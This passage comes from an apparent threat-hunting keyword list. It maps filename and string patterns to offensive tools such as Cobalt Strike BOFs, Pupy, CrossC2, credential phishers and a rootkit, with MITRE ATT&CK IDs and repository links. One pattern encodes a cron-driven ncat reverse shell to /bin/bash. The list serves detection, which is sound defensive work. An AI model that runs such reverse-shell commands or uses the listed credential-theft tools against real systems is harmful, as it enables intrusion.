static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/xforcered/CredBandit,1,1,N/A,10,10,218,25,2021-07-14T17:42:41Z,2021-03-17T15:19:33Z -*creddump.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Credential Guard bypass might fail if RunAsPPL is enabled*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*CredentialAccess_CredentialDumping_BrowserDataCSharp.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*CredentialAccess_CredentialDumping_KiwiOnLocal.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - 
T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*CredentialAccess_CredentialDumping_SunLogin.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*CredentialAccess_CredentialDumping_WindowsHashDump.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*CredentialAccess_CredentialDumping_WindowsWDigestEnable.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z 
-*CredentialAccess_CredentialInFiles_BrowserData.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*CredentialAccess_CredentialInFiles_WindowsSoftware.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*CredentialAccess_InputCapture_CredUIPromptForWindowsCredentialsW.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Credentials Found in Configurations!*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - 
T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,0,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*Credentials*hekatomb_*.txt,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*Credentials/CacheDump.*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Credentials/certsync_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*Credentials/LSASecrets.*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Credentials/SAMDump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network 
Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*CredPhisher.csproj*,offensive_tool_keyword,CredPhisher,Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function,T1056.002 - T1111,TA0004 ,N/A,N/A,Phishing,https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*CredPhisher.exe*,offensive_tool_keyword,CredPhisher,Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function,T1056.002 - T1111,TA0004 ,N/A,N/A,Phishing,https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*credphisher.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*cred-popper *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*CredPrompt/CredPrompt.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - 
FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*creds_hunt.exe*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*CredsLeaker*,offensive_tool_keyword,CredsLeaker,This script used to display a powershell credentials box asked the user for credentials. However. That was highly noticeable. Now its time to utilize Windows Security popup!,T1087 - T1056 - T1003 - T1059 - T1110,TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/Dviros/CredsLeaker,1,1,N/A,N/A,3,295,73,2021-03-31T11:49:57Z,2018-03-05T07:53:31Z -*CredsPhish.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*Credz-Plz.ps1*,offensive_tool_keyword,OMG-Credz-Plz,A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.,T1056.002 - T1566.001 - T1567.002,TA0004 - TA0040 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*Credz-Plz-Execute.txt*,offensive_tool_keyword,OMG-Credz-Plz,A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.,T1056.002 - T1566.001 - T1567.002,TA0004 - TA0040 - TA0010,N/A,N/A,Credential 
Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*cribdragg3r/Alaris*,offensive_tool_keyword,cobaltstrike,A protective and Low Level Shellcode Loader that defeats modern EDR systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cribdragg3r/Alaris,1,1,N/A,10,10,846,136,2021-11-01T05:00:43Z,2020-02-22T15:42:37Z -*crimeware*/zeus.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*crisis_monitor start*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*crisis_monitor stop*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - 
T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*crisprss/PrintSpoofer*,offensive_tool_keyword,cobaltstrike,Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crisprss/PrintSpoofer,1,1,N/A,10,10,76,8,2021-10-07T17:45:00Z,2021-10-07T17:28:45Z -*crk_get_key1*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*crk_get_key2*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*crk_max_keys_per_crypt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential 
Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*crk_methods.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*crk_password_loop*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Cronos Rootkit.*,offensive_tool_keyword,Cronos-Rootkit,Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/XaFF-XaFF/Cronos-Rootkit,1,0,N/A,N/A,8,742,176,2022-03-29T08:26:03Z,2021-08-25T08:54:45Z -*CronosDebugger.*,offensive_tool_keyword,Cronos-Rootkit,Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/XaFF-XaFF/Cronos-Rootkit,1,1,N/A,N/A,8,742,176,2022-03-29T08:26:03Z,2021-08-25T08:54:45Z -*CronosRootkit.*,offensive_tool_keyword,Cronos-Rootkit,Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
protect and elevate them with token manipulation.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/XaFF-XaFF/Cronos-Rootkit,1,1,N/A,N/A,8,742,176,2022-03-29T08:26:03Z,2021-08-25T08:54:45Z -*crontab* sleep *ncat * -e /bin/bash*crontab*,greyware_tool_keyword,crontab,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,POST Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*crop.exe \\*\*.lnk \\*\harvest \\*\harvest*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,0,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z -*CrossC2 beacon*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - 
FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*crossc2 dyn load*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,0,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2 framework*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2.cna*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2.cna*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2.git*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2.Linux*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2.MacOS*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2.Win*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2_dev_*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - 